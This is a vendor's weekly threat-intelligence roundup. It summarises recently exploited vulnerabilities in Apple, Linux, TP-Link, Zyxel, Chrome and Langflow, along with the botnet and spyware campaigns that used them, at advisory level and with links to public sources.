In this week’s cybersecurity developments, CISA added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, spanning the Linux Kernel, Apple's zero-click flaw, and a command injection bug in TP-Link routers. Meanwhile, GreyNoise reported active exploitation of a two-year-old Zyxel firewall vulnerability, highlighting continued threats targeting unpatched edge devices.  

Botnet activity surged recently as threat actors ramped up exploitation campaigns leveraging malware families like EnemyBot, Sysrv-K, Andoryu, and Androxgh0st. These strains primarily targeted known vulnerabilities in widely used platforms such as Cloud Gateway, GitLab, and various PHP-based services. In parallel, IoT-focused threats including Bashlite, BrickerBot, Tsunami, and Mirai intensified their assaults on Eir D1000 modems, swiftly compromising exposed devices and expanding their presence across internet-facing infrastructure.  

On the advanced threat front, multiple sophisticated operations were uncovered. Positive Technologies reported the exploitation of a Google Chrome zero-day by the threat actor Team46, while Trend Micro exposed a sophisticated campaign abusing a critical vulnerability in Langflow to deliver the Flodrix botnet. Furthermore, a zero-click flaw in Apple devices was weaponized to deploy Graphite spyware, underscoring the increasing scale of targeted surveillance operations.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.

CVE-2025-43200
A Zero-click Logic Vulnerability in Messages application affecting multiple Apple platforms including iOS, iPadOS, macOS Sequoia, Sonoma, Ventura, watchOS and visionOS was identified and addressed by Apple in February 2025. With a CVSS Score of 9.8, the flaw allowed attackers to deploy spyware on targeted devices without any user interaction, making it particularly dangerous. Apple attributed the issue to a logic flaw triggered by the processing of maliciously crafted photos or videos shared via an iCloud Link. In response, the company released security updates across all impacted platforms to address the vulnerability. Given its severity and the potential for widespread exploitation, the flaw has been added to the CISA's Known Exploited Vulnerabilities (KEV) catalog, urging organizations and users to apply the necessary patches immediately to protect against compromise.

CVE-2023-0386
An Improper Ownership Management Vulnerability in the Linux Kernel allows local attackers to escalate privileges by exploiting flaws in the OverlayFS component. With a high CVSS Score of 7.8, this issue arises due to incorrect handling of file ownership and capabilities during copy-up operations between months, which can result in unauthorized root-level access. Though a patch was issued via a commit in 2023, the vulnerability was recently added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, highlighting its active exploitation and the urgent need to secure affected Linux systems.

CVE-2023-33538
A Command Injection Vulnerability in TP-Link router models specifically TL-WR940N V2/V4, TL-WR841N V8/V10, and TL-WR740N V1/V2. Having a high CVSS score of 8.8, this flaw resides in the /userRpm/WlanNetworkRpm component and can be exploited via the ssid1 GET parameter to execute arbitrary system commands. TP-Link has officially discontinued support for all three affected models, meaning they will no longer receive firmware updates or security patches. Although a proof-of-concept (PoC) exploit has been publicly released, the extent of real-world exploitation and the actors behind it remain unconfirmed. Given the critical risk and lack of mitigations, CISA has added this vulnerability to its Known Exploited Vulnerabilities (KEV) catalog and strongly urges users to discontinue use of these outdated devices.

CVE-2023-28771
An OS Command Injection Vulnerability in Zyxel firewall models, including ATP, USG FLEX, VPN, and ZyWALL/USG series. Assigned a CVSS Score of 9.8, this flaw allows unauthenticated attackers to remotely execute system commands by sending specially crafted packets to the affected devices. Although Zyxel addressed the issue in 2023 through patched firmware releases ZLD V5.36 and ZLD V4.73 Patch 1, recent threat intelligence from GreyNoise has revealed active exploitation between early June and June 16, 2025, 244 unique IPs, showing no other exploit or scanning activity, targeted this vulnerability, indicating a focused and potentially automated attack campaign.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.      

CVE-2025-2783
A recently patched vulnerability in Google Chrome, identified as CVE-2025-2783, was actively exploited in the wild as zero-day by a threat actor known as Team46 (also known as TaxOff) to deploy a sophisticated backdoor named Trinper. This activity, discovered in mid-March 2025 by researchers at Positive Technologies, began with a phishing email containing a malicious link. When clicked, the link triggered a one-click sandbox escape exploit leveraging the Chrome vulnerability, allowing for silent installation of the Trinper backdoor. Developed in C++, Trinper utilizes multithreading to perform a range of malicious tasks, including capturing system information, logging keystrokes, collecting documents with specific extensions (.doc, .xls, .ppt, .rtf, .pdf), and establishing persistent communication with a remote command-and-control server. This enabled TaxOff to issue remote commands and exfiltrate stolen data. Given the severity and stealth of the campaign, organizations are strongly urged to apply security updates to Google Chrome without delay.

CVE-2025-3248
Trend Micro has identified an ongoing and highly sophisticated campaign exploiting this missing authentication vulnerability in Langflow, a widely used open-source framework for building AI-driven applications. This active exploitation enables threat actors to deploy the Flodrix botnet, a stealthy and adaptive malware strain designed for both persistence and disruption.

Upon successful exploitation, Flodrix establishes command-and-control (C&C) communication over both standard TCP and the Tor anonymity network to evade detection. It then performs extensive environment reconnaissance and dumping system variables to assess the host’s capabilities. The botnet also identifies and terminates watchdog processes, BusyBox instances, and potentially malicious scripts stored in /tmp directories, further solidifying its presence. In addition to its stealth features, Flodrix is equipped to launch a wide array of distributed denial-of-service (DDoS) attacks, employing techniques such as tcpraw, udpplain, handshake, and ts3 to overwhelm targeted networks.

CVE-2025-43200
According to Citizen Labs, this zero-click vulnerability exploited in Apple devices was used to deploy Paragon's Graphite spyware, a commercial surveillance platform linked to targeted cyber-espionage operations. Delivered via a zero-click iMessage exploit on devices running iOS 18.2.1, the attack required no user interaction. Once the flaw was triggered, the spyware silently contacted a command-and-control server (46.183.184[.]91) and began installing surveillance components in the background. Forensic analysis revealed that the exploit was used target Italian Journalist Ciro Pellegrino and a prominent European journalist.

CVE-2023-28771
On June 16,2025, GreyNoise detected a sharp spike in exploitation attempts targeting a critical remote code execution vulnerability CVE-2023-28771, in Zyxel firewalls. The flaw, found in the Internet Key Exchange (IKE) packet decoder, can be triggered via crafted UDP packets sent to port 500. A total of 244 unique IPs were observed attempting exploitation in a short timeframe, suggesting a coordinated and automated campaign. The attack patterns align with known Mirai botnet variants, indicating active botnet-driven targeting of unpatched IoT and edge devices. Affected regions include the U.S., U.K., Spain, Germany and India.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/06/16/cisa-adds-two-known-exploited-vulnerabilities-catalog  
2. https://www.cisa.gov/news-events/alerts/2025/06/17/cisa-adds-one-known-exploited-vulnerability-catalog
3. https://www.greynoise.io/blog/exploit-attempts-targeting-zyxel-cve-2023-28771
4. https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/team46-and-taxoff-two-sides-of-the-same-coin
5. https://citizenlab.ca/2025/06/first-forensic-confirmation-of-paragons-ios-mercenary-spyware-finds-journalists-targeted/
6. https://www.trendmicro.com/en_us/research/25/f/langflow-vulnerability-flodric-botnet.html